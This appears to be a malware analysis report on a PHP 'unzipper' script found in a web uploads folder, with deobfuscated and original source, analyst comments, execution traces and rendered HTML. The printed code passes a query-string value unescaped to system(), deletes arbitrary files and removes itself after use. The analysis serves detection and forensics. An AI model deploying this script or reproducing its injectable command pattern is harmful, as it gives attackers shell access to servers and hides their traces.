PHP Malware Analysis

unzipper.php, unzipper.phtml

md5: 72c147f5023d43607262134a3559ba92


Deobfuscated PHP code

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-UK">
	<head>
		<title>Billy's Unzipper Script</title>
		<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
		<meta name="generator" content="thekid" />
		<meta name='robots' content='noindex,nofollow' />
	</head>
	<body>
		<?php 
// Analyst notes: a self-deleting "unzipper" helper. It extracts an
// attacker-chosen archive into the current directory via the shell, optionally
// deletes the archive, and (by default) deletes itself afterwards. No input
// below is validated or escaped.
//
// All three controls come straight from the query string. The form further down
// submits with method="get", so every invocation (file name + flags) ends up in
// the web server access log, which is the main detection artefact once the
// script has removed itself. With no parameters (as in the traces below) the
// reads yield NULL and both action branches are skipped.
$file = $_GET['file'];
$removeorig = $_GET['removeorig'];
$unzipper = $_GET['unzipper'];
if (isset($file)) {
    echo "Unzipping " . $file . "...<br />\n";
    // OS command injection sink: $file is concatenated unescaped into a command
    // line that system() hands to /bin/sh, so the web server user executes
    // whatever the request supplies, not only unzip. `unzip -o` also overwrites
    // existing files in the script's working directory without prompting.
    // Telemetry: shell/unzip child processes spawned by the web server process.
    system('unzip -o ' . $file);
    echo "<hr />\n";
    if (isset($removeorig)) {
        echo "Deleting Zip...<br />\n";
        // Unlinks an attacker-chosen path (relative to the working directory);
        // nothing checks that it is the archive that was just extracted.
        unlink("{$file}");
    }
}
if (isset($unzipper)) {
    echo "Deleting Script...<br />\n";
    // Anti-forensics: the script removes itself. The original source (see the
    // "Original PHP code" listing on this page) uses unlink(__FILE__); the
    // literal path here appears to be the analysis environment's copy of the
    // sample, resolved during deobfuscation. The checkbox driving this branch
    // is ticked by default, so one successful use normally leaves no script on
    // disk; recover evidence from access logs and backups rather than the web root.
    unlink("/var/www/html/unzipper.php.715901cfb7679c22f57a45e8b37d6289.bin");
    echo "Script Deleted!<br /><a href=\"/\">HOME</a>\n";
    exit;
}
// Build a radio-button list of every *.zip in the current directory.
$handler = opendir(".");
echo "Please choose a file to unzip: <br />\n";
echo "<form action=\"\" method=\"get\">\n";
$found = 0;
// The loop stops on the first falsy return: FALSE at end of directory (the
// traces below end this way), but also on an entry literally named "0".
while ($file = readdir($handler)) {
    // strrchr() searches only for the first character of its needle ('.'), so
    // this yields the entry's last extension (the trace shows 'prepend.php'
    // -> '.php') and keeps only names ending in ".zip". Loose != comparison.
    if (strrchr($file, ".zip") != ".zip") {
        continue;
    }
    // Directory entry names are echoed into HTML attributes and text unescaped.
    echo '<input type="radio" name="file" value="' . $file . '"/> ' . $file . "<br />\n";
    $found = 1;
}
echo "<hr/><input type=\"checkbox\" name=\"removeorig\" value=\"Remove\" />Delete .zip after extraction?<br />\n";
// Self-delete is opt-out: the box is pre-checked.
echo "<input type=\"checkbox\" name=\"unzipper\" value=\"Remove\" checked=\"checked\" />Delete Unzipper Script? (Uncheck this box if you have more files to unzip!)<br />\n";
closedir($handler);
// $found is 0 or 1, so the loose == FALSE test is effectively === 0 here.
if ($found == FALSE) {
    echo "No .zips found<br />";
} else {
    echo "<br />NOTE: This unzips and <strong>REPLACES</strong> files.<br /><br /><input type=\"submit\" value=\"Unzip!\" />";
}
echo "\n</form>";
?>
		<p><a href="http://validator.w3.org/check?uri=referer"><img src="http://www.w3.org/Icons/valid-xhtml10" alt="Valid XHTML 1.0 Transitional" height="31" width="88" /></a></p>
	</body>
</html>

Execution traces

data/traces/72c147f5023d43607262134a3559ba92_trace-1676241548.2028.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 20:39:34.100662]
1	0	1	0.000172	393528
1	3	0	0.000265	401072	{main}	1		/var/www/html/uploads/unzipper.phtml	0	0
1		A						/var/www/html/uploads/unzipper.phtml	11	$file = NULL
1		A						/var/www/html/uploads/unzipper.phtml	12	$removeorig = NULL
1		A						/var/www/html/uploads/unzipper.phtml	13	$unzipper = NULL
2	4	0	0.000350	401072	opendir	0		/var/www/html/uploads/unzipper.phtml	30	1	'.'
2	4	1	0.000371	401464
2	4	R			resource(4) of type (stream)
1		A						/var/www/html/uploads/unzipper.phtml	30	$handler = resource(4) of type (stream)
1		A						/var/www/html/uploads/unzipper.phtml	33	$found = 0
2	5	0	0.000412	401432	readdir	0		/var/www/html/uploads/unzipper.phtml	34	1	resource(4) of type (stream)
2	5	1	0.000432	401504
2	5	R			'..'
1		A						/var/www/html/uploads/unzipper.phtml	34	$file = '..'
2	6	0	0.000457	401464	strrchr	0		/var/www/html/uploads/unzipper.phtml	36	2	'..'	'.zip'
2	6	1	0.000471	401568
2	6	R			'.'
2	7	0	0.000485	401464	readdir	0		/var/www/html/uploads/unzipper.phtml	34	1	resource(4) of type (stream)
2	7	1	0.000498	401536
2	7	R			'.'
1		A						/var/www/html/uploads/unzipper.phtml	34	$file = '.'
2	8	0	0.000521	401464	strrchr	0		/var/www/html/uploads/unzipper.phtml	36	2	'.'	'.zip'
2	8	1	0.000534	401568
2	8	R			'.'
2	9	0	0.000547	401464	readdir	0		/var/www/html/uploads/unzipper.phtml	34	1	resource(4) of type (stream)
2	9	1	0.000560	401544
2	9	R			'prepend.php'
1		A						/var/www/html/uploads/unzipper.phtml	34	$file = 'prepend.php'
2	10	0	0.000584	401472	strrchr	0		/var/www/html/uploads/unzipper.phtml	36	2	'prepend.php'	'.zip'
2	10	1	0.000598	401576
2	10	R			'.php'
2	11	0	0.000611	401472	readdir	0		/var/www/html/uploads/unzipper.phtml	34	1	resource(4) of type (stream)
2	11	1	0.000624	401544
2	11	R			'data'
1		A						/var/www/html/uploads/unzipper.phtml	34	$file = 'data'
2	12	0	0.000647	401464	strrchr	0		/var/www/html/uploads/unzipper.phtml	36	2	'data'	'.zip'
2	12	1	0.000659	401536
2	12	R			FALSE
2	13	0	0.000672	401464	readdir	0		/var/www/html/uploads/unzipper.phtml	34	1	resource(4) of type (stream)
2	13	1	0.000685	401544
2	13	R			'.htaccess'
1		A						/var/www/html/uploads/unzipper.phtml	34	$file = '.htaccess'
2	14	0	0.000709	401472	strrchr	0		/var/www/html/uploads/unzipper.phtml	36	2	'.htaccess'	'.zip'
2	14	1	0.000722	401584
2	14	R			'.htaccess'
2	15	0	0.000736	401472	readdir	0		/var/www/html/uploads/unzipper.phtml	34	1	resource(4) of type (stream)
2	15	1	0.000749	401552
2	15	R			'unzipper.phtml'
1		A						/var/www/html/uploads/unzipper.phtml	34	$file = 'unzipper.phtml'
2	16	0	0.000773	401472	strrchr	0		/var/www/html/uploads/unzipper.phtml	36	2	'unzipper.phtml'	'.zip'
2	16	1	0.000787	401576
2	16	R			'.phtml'
2	17	0	0.000800	401472	readdir	0		/var/www/html/uploads/unzipper.phtml	34	1	resource(4) of type (stream)
2	17	1	0.000814	401512
2	17	R			FALSE
1		A						/var/www/html/uploads/unzipper.phtml	34	$file = FALSE
2	18	0	0.000837	401432	closedir	0		/var/www/html/uploads/unzipper.phtml	44	1	resource(4) of type (stream)
2	18	1	0.000852	401248
2	18	R			NULL
1	3	1	0.000867	401208
			0.000892	314416
TRACE END   [2023-02-12 20:39:34.101411]

data/traces/72c147f5023d43607262134a3559ba92_trace-1676262974.2249.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-13 02:36:40.122787]
1	0	1	0.000219	393528
1	3	0	0.000325	401072	{main}	1		/var/www/html/uploads/unzipper.php	0	0
1		A						/var/www/html/uploads/unzipper.php	11	$file = NULL
1		A						/var/www/html/uploads/unzipper.php	12	$removeorig = NULL
1		A						/var/www/html/uploads/unzipper.php	13	$unzipper = NULL
2	4	0	0.000414	401072	opendir	0		/var/www/html/uploads/unzipper.php	30	1	'.'
2	4	1	0.000438	401464
2	4	R			resource(4) of type (stream)
1		A						/var/www/html/uploads/unzipper.php	30	$handler = resource(4) of type (stream)
1		A						/var/www/html/uploads/unzipper.php	33	$found = 0
2	5	0	0.000479	401432	readdir	0		/var/www/html/uploads/unzipper.php	34	1	resource(4) of type (stream)
2	5	1	0.000501	401512
2	5	R			'unzipper.php'
1		A						/var/www/html/uploads/unzipper.php	34	$file = 'unzipper.php'
2	6	0	0.000528	401472	strrchr	0		/var/www/html/uploads/unzipper.php	36	2	'unzipper.php'	'.zip'
2	6	1	0.000543	401576
2	6	R			'.php'
2	7	0	0.000558	401472	readdir	0		/var/www/html/uploads/unzipper.php	34	1	resource(4) of type (stream)
2	7	1	0.000572	401544
2	7	R			'..'
1		A						/var/www/html/uploads/unzipper.php	34	$file = '..'
2	8	0	0.000596	401464	strrchr	0		/var/www/html/uploads/unzipper.php	36	2	'..'	'.zip'
2	8	1	0.000610	401568
2	8	R			'.'
2	9	0	0.000622	401464	readdir	0		/var/www/html/uploads/unzipper.php	34	1	resource(4) of type (stream)
2	9	1	0.000636	401536
2	9	R			'.'
1		A						/var/www/html/uploads/unzipper.php	34	$file = '.'
2	10	0	0.000659	401464	strrchr	0		/var/www/html/uploads/unzipper.php	36	2	'.'	'.zip'
2	10	1	0.000673	401568
2	10	R			'.'
2	11	0	0.000686	401464	readdir	0		/var/www/html/uploads/unzipper.php	34	1	resource(4) of type (stream)
2	11	1	0.000700	401544
2	11	R			'prepend.php'
1		A						/var/www/html/uploads/unzipper.php	34	$file = 'prepend.php'
2	12	0	0.000725	401472	strrchr	0		/var/www/html/uploads/unzipper.php	36	2	'prepend.php'	'.zip'
2	12	1	0.000738	401576
2	12	R			'.php'
2	13	0	0.000752	401472	readdir	0		/var/www/html/uploads/unzipper.php	34	1	resource(4) of type (stream)
2	13	1	0.000765	401544
2	13	R			'data'
1		A						/var/www/html/uploads/unzipper.php	34	$file = 'data'
2	14	0	0.000788	401464	strrchr	0		/var/www/html/uploads/unzipper.php	36	2	'data'	'.zip'
2	14	1	0.000802	401536
2	14	R			FALSE
2	15	0	0.000816	401464	readdir	0		/var/www/html/uploads/unzipper.php	34	1	resource(4) of type (stream)
2	15	1	0.000829	401544
2	15	R			'.htaccess'
1		A						/var/www/html/uploads/unzipper.php	34	$file = '.htaccess'
2	16	0	0.000853	401472	strrchr	0		/var/www/html/uploads/unzipper.php	36	2	'.htaccess'	'.zip'
2	16	1	0.000866	401584
2	16	R			'.htaccess'
2	17	0	0.000880	401472	readdir	0		/var/www/html/uploads/unzipper.php	34	1	resource(4) of type (stream)
2	17	1	0.000894	401512
2	17	R			FALSE
1		A						/var/www/html/uploads/unzipper.php	34	$file = FALSE
2	18	0	0.000918	401432	closedir	0		/var/www/html/uploads/unzipper.php	44	1	resource(4) of type (stream)
2	18	1	0.000934	401248
2	18	R			NULL
1	3	1	0.000948	401208
			0.000978	314416
TRACE END   [2023-02-13 02:36:40.123590]


Generated HTML code

<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-UK"><head>
		<title>Billy's Unzipper Script</title>
		<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
		<meta name="generator" content="thekid">
		<meta name="robots" content="noindex,nofollow">
	</head>
	<body>
		Please choose a file to unzip: <br>
<form action="" method="get">
<hr><input type="checkbox" name="removeorig" value="Remove">Delete .zip after extraction?<br>
<input type="checkbox" name="unzipper" value="Remove" checked="checked">Delete Unzipper Script? (Uncheck this box if you have more files to unzip!)<br>
No .zips found<br>
</form>		<p><a href="http://validator.w3.org/check?uri=referer"><img src="http://www.w3.org/Icons/valid-xhtml10" alt="Valid XHTML 1.0 Transitional" height="31" width="88"></a></p>
	

</body></html>

Original PHP code

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-UK">
	<head>
		<title>Billy's Unzipper Script</title>
		<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
		<meta name="generator" content="thekid" />
		<meta name='robots' content='noindex,nofollow' />
	</head>
	<body>
		<?php
			// Analyst notes: original (unflattened) source of the sample. Three
			// query-string parameters drive it: `file` (archive to extract),
			// `removeorig` (delete the archive afterwards) and `unzipper`
			// (delete this script afterwards). None is validated. Because the
			// form uses method="get", each use is recorded with its parameters
			// in the web server access log.
			$file = $_GET['file'];
			$removeorig = $_GET['removeorig'];
			$unzipper = $_GET['unzipper'];
			if (isset($file))
			{
				echo "Unzipping " . $file . "...<br />\n";
				// Command injection sink: the raw `file` value is appended to a
				// shell command line run through system(). `-o` overwrites
				// existing files in the working directory silently.
				system('unzip -o ' . $file);
				echo "<hr />\n";
			   	if (isset($removeorig)) {
					echo "Deleting Zip...<br />\n";
					// Deletes whatever path `file` names, relative to the cwd.
					unlink("$file");
				}
			}
			if (isset($unzipper)) {
				echo "Deleting Script...<br />\n";
				// Self-deletion (anti-forensics): removes the running script
				// itself. The deobfuscated listing above shows __FILE__ already
				// resolved to a concrete path, presumably by the analysis tooling.
				unlink(__FILE__);
				echo "Script Deleted!<br /><a href=\"/\">HOME</a>\n";
				exit;
			}
			// List every *.zip in the current directory as a radio button.
			$handler = opendir(".");
			echo "Please choose a file to unzip: <br />\n";
			echo '<form action="" method="get">'."\n";
			$found = 0;
			// Terminates on the first falsy readdir() result (FALSE at end of
			// directory, or an entry named "0").
			while ($file = readdir($handler))
			{
				// strrchr() uses only the first character of ".zip", i.e. '.',
				// so this compares the entry's last extension against ".zip"
				// with a loose != (the traces show 'prepend.php' -> '.php').
	       			 if(strrchr($file,".zip") != ".zip" ) { continue; }
				// The braces below form a bare block, not part of the `if`;
				// it is harmless and the deobfuscated listing flattens it.
				{
					// Entry name is written into the HTML unescaped.
					echo '<input type="radio" name="file" value="' . $file . '"/> ' . $file . "<br />\n";
					$found = 1;
				}
			}
			echo '<hr/><input type="checkbox" name="removeorig" value="Remove" />Delete .zip after extraction?'."<br />\n";
			// Self-delete is on by default (checked="checked").
			echo '<input type="checkbox" name="unzipper" value="Remove" checked="checked" />Delete Unzipper Script? (Uncheck this box if you have more files to unzip!)'."<br />\n";
			closedir($handler);
			// $found is 0/1, so `== FALSE` behaves as `=== 0` here.
			if ($found == FALSE)
				echo "No .zips found<br />";
			else
				echo '<br />NOTE: This unzips and <strong>REPLACES</strong> files.<br /><br /><input type="submit" value="Unzip!" />';
		
			echo "\n</form>";
		?>
		<p><a href="http://validator.w3.org/check?uri=referer"><img src="http://www.w3.org/Icons/valid-xhtml10" alt="Valid XHTML 1.0 Transitional" height="31" width="88" /></a></p>
	</body>
</html>